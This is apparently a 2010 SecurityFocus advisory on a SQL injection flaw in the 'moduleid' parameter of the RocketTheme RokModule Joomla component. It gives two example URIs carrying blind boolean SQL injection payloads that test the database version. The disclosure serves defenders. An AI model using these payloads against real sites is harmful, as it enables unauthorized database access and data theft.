RocketTheme RokModule Joomla! Component 'moduleid' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=5 << true
http://www.example.com/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=4 << false


 

Privacy Statement
Copyright 2010, SecurityFocus